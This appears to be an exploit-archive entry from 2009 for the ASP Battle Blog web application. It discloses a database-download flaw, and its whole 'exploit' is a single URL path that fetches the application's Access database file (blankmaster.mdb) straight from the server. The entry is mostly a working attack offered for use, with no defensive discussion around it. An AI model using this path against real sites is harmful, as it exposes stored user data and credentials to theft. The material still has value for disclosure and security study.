id: 10489
date: 12/29/2009
title: ASP Battle Blog DB Download Vulnerability
author: indoushka
cves: 

=========================================
ASP Battle Blog DB Download Vulnerability
=========================================

========================================================================================                 
| # Title    : Asp Battle Blog DB Download Vulnerability                               |
| # Author   : indoushka                                                               |
| # Script   : Battle Blog                                                             |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/Battle_Blog/database/blankmaster.mdb
|
================================   Dz-Ghost Team   ========================================



#  0day.today [2023-03-25]  #